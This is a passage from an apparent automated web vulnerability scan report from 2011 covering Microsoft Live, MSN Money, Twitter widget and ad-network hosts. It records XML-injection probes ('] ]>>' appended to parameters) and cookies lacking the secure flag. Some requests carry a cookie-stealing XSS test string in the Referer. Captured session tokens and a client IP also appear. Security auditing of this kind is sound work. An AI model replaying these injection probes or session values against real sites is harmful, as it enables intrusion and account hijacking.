<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DF4508E035BED355</RequestId><HostId>5eaf9xpzYqO1Ts+3wPR0JLFqTIslfmZPq7Ruu2tR2NFB4jt60v
...[SNIP]...

9.21. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1296391709300&count=horizontal&lang=en&related=breakingnews%3AThe%20fastest%20breaking%20news%20on%20Twitter.&text=Lawrence%3A%20'Palin's%20stock%20cannot%20go%20up'&url=http%3A%2F%2Fthelastword.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941104-lawrence-palins-stock-cannot-go-up&via=thelastword HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sun, 30 Jan 2011 19:59:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0D13A4385943B1EE</RequestId><HostId>I2Cxu96Bc3Ib70OwqwF/Q4O/TfYE5Blgo4e50/9Vid7qqDqvRW
...[SNIP]...

9.22. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1296391709300&count=horizontal&lang=en&related=breakingnews%3AThe%20fastest%20breaking%20news%20on%20Twitter.&text=Lawrence%3A%20'Palin's%20stock%20cannot%20go%20up'&url=http%3A%2F%2Fthelastword.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941104-lawrence-palins-stock-cannot-go-up&via=thelastword HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sun, 30 Jan 2011 19:59:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BB42C0F6706A07F3</RequestId><HostId>7Zn86K+sg0EvaXJCBHyIanr9wyBBkM89+vhYKFZCDz2ackj4ZM
...[SNIP]...

9.23. https://security.live.com/LoginStage.aspx [lmif parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The lmif parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the lmif parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /LoginStage.aspx?lmif=1000]]>>&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:14:46 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B05 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/
Set-Cookie: ASP.NET_SessionId=ozj3eqaylrhs4245xacvnj55; path=/; HttpOnly
Set-Cookie: xid=8734b762-01b6-4243-a196-1dde28c1274d&&TK2xxxxxxx1B05&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=en-us&B=en&P=; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:34:46 GMT; path=/
Set-Cookie: wlv=A|_-d:s*5hzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:rb9ydCGOzYg=:b5fPIpVKfwyqwhDlUnnLRb9EGUhzmv2Yv1+StJ/w1zI=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
<script type="text/javascript">
ltr = 1;
currentVersion = '9.000.16531.00';
XML.SetAjaxErrorString('Sorry we couldn\'t complete your request.  Please try again.');
Wait.waitText = 'Please wait...';
</script>
...[SNIP]...

9.24. http://services.money.redacted/QuoteService/dynamic [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://services.money.msn.com
Path:	/QuoteService/dynamic

Issue detail

Request

GET /QuoteService/dynamic?format=json]]>>&symbol= HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:19:07 GMT
Connection: close
Content-Length: 51

<?xml version="1.0" encoding="utf-8"?><root></root>

9.25. http://services.money.redacted/quoteservice/streaming [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://services.money.msn.com
Path:	/quoteservice/streaming

Issue detail

Request

GET /quoteservice/streaming?format=json]]>>&symbol= HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:19:09 GMT
Connection: close
Content-Length: 51

<?xml version="1.0" encoding="utf-8"?><root></root>

9.26. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://srv.admailtiser.com
Path:	/pix/master_pixel.js

Issue detail

Request

GET /pix]]>>/master_pixel.js HTTP/1.1
Host: srv.admailtiser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2;

Response

HTTP/1.0 404 Not Found
x-amz-request-id: 0961C9CA9A5345B1
x-amz-id-2: hLB+PJXuytjuMcgNsKJJYZgMfWLZTB79WR/JkxL6UakMRmJ4dBgqA0aC3NC5b6be
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:19:28 GMT
Server: AmazonS3
Age: 1
Content-Length: 288
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 832ca13cd8d1a57caa5aeda99dfa54eeb25be5d7529fff10d1ba00e12b1e100bd766d00b0203de38
Via: 1.0 de8307e7de3620df506484cdd13a4606.cloudfront.net:11180 (CloudFront), 1.0 c3dbce96ffc5d90223789659f3b896a1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>pix]]>>/master_pixel.js</Key><RequestId>0961C9CA9A5345B1</RequestId><
...[SNIP]...

9.27. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://srv.admailtiser.com
Path:	/pix/master_pixel.js

Issue detail

Request

GET /pix/master_pixel.js]]>> HTTP/1.1
Host: srv.admailtiser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2;

Response

HTTP/1.0 404 Not Found
x-amz-request-id: EE3EF78EC3A56325
x-amz-id-2: tn3j7/pY3zUPy2FZhprUHOFaNaN7Z7j0mX6mlU1O82AMVunyu0q2Xr82FNiy3M4J
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:19:31 GMT
Server: AmazonS3
Content-Length: 288
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e3e74461d12e8c1e0ec2857ffc0cd2715d7227c456be284ad14176c3ac6a859a9c55fcf9b6eb1e40
Via: 1.0 7968d93e1fd68721fd2c757c85758124.cloudfront.net:11180 (CloudFront), 1.0 c3dbce96ffc5d90223789659f3b896a1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>pix/master_pixel.js]]>></Key><RequestId>EE3EF78EC3A56325</RequestId><
...[SNIP]...

10. SSL cookie without secure flag set previous next
There are 26 instances of this issue:

https://careers.microsoft.com/
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/signin.aspx
https://secure.opinionlab.com/ccc01/comment_card.asp
https://secure.opinionlab.com/ccc01/o.asp
https://secure.opinionlab.com/ccc01/o.asp
https://security.live.com/LoginStage.aspx
https://security.live.com/LoginStage.aspx
https://twitter.com/ToddKenreck
https://www.msnfeedback.com/perseus/se.ashx
https://login.live.com/login.srf
https://login.live.com/pp900/
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://login.live.com/resetpw.srf
https://msnia.login.live.com/ppsecure/post.srf
https://sb.voicefive.com/b
https://www.newsvine.com/
https://www.newsvine.com/_action/user/logout
https://www.newsvine.com/_nv/accounts/global/information
https://www.newsvine.com/_nv/accounts/login
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
https://www.newsvine.com/_nv/api/accounts/login
https://www.newsvine.com/_nv/api/accounts/resetPassword

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

10.1. https://careers.microsoft.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://careers.microsoft.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=imfrgsjgkicnzcjt42531kjd; path=/; HttpOnly
ASP.NET_SessionId=h2kb0f3zzbexr4550xzpoczx; path=/; HttpOnly

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://careers.microsoft.com/gclp.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=imfrgsjgkicnzcjt42531kjd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h2kb0f3zzbexr4550xzpoczx; path=/; HttpOnly
Set-Cookie: SessionProfile=imfrgsjgkicnzcjt42531kjd; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sat, 29 Jan 2011 23:45:40 GMT
Connection: close
Content-Length: 155

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://careers.microsoft.com/gclp.aspx">here</a>.</h2>
</body></html>

10.2. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly
forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

10.3. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; path=/; HttpOnly
forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:22 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

10.4. https://secure.opinionlab.com/ccc01/comment_card.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp?time1= HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/
Date: Sun, 30 Jan 2011 01:37:11 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

10.5. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/
Date: Sat, 29 Jan 2011 23:50:47 GMT
Connection: close

10.6. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/
Date: Sun, 30 Jan 2011 16:57:26 GMT
Connection: close

10.7. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=h2apx4z4mmbean55o3laku45; path=/; HttpOnly
mkt=ep=en-US; domain=.live.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:56 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/
Set-Cookie: ASP.NET_SessionId=h2apx4z4mmbean55o3laku45; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title></h
...[SNIP]...

10.8. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=bh2zle2prh4zk145gn1nyx45; path=/; HttpOnly
xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
mkt1=norm=en; domain=.live.com; path=/
mkt2=marketing=en-us; domain=.security.live.com; path=/
wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=bh2zle2prh4zk145gn1nyx45; path=/; HttpOnly
Set-Cookie: xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:42 GMT; path=/
Set-Cookie: wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

10.9. https://twitter.com/ToddKenreck previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/ToddKenreck

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.10. https://www.msnfeedback.com/perseus/se.ashx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.msnfeedback.com
Path:	/perseus/se.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /perseus/se.ashx HTTP/1.1
Host: www.msnfeedback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 01:58:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /perseus/se.htm
Set-Cookie: ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 132

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/perseus/se.htm'>here</a>.</h2>
</body></html>

10.11. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1
Host: login.live.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
